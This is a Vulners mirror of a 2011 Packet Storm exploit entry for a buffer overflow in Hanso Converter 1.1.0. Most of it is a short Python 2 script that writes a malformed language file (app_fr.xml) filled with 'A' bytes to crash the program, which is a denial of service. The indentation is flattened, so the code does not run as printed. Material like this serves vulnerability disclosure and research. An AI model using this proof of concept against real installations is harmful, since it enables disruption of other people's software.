Lucene search
K

Hanso Converter 1.1.0 Buffer Overflow

🗓️ 07 Feb 2011 00:00:00Reported by badc0reType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Hanso Converter v1.1.0 Buffer Overflow Exploi

Code
`# Exploit Title: Hanso Converter v1.1.0 Language File Buffer Overflow – Denial OF Service  
# Date: 05.02.2011  
# Author: Dame Jovanoski(badc0re)  
# Software Link: http://www.hansotools.com/downloads/hanso-converter-setup.exe  
# Version: v1.1.0  
# Tested on: XP sp3  
  
from struct import *  
import time  
  
f=open("app_fr.xml","w")  
print "Creating expoit."  
time.sleep(1)  
print "Creating explot.."  
time.sleep(1)  
print "Creating explot "  
junk="\x41"*100  
try:  
f.write(junk)  
f.close()  
print "File created"  
except:  
print "File cannot be created"   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2011 00:00Current
0.6Low risk
Vulners AI Score0.6
27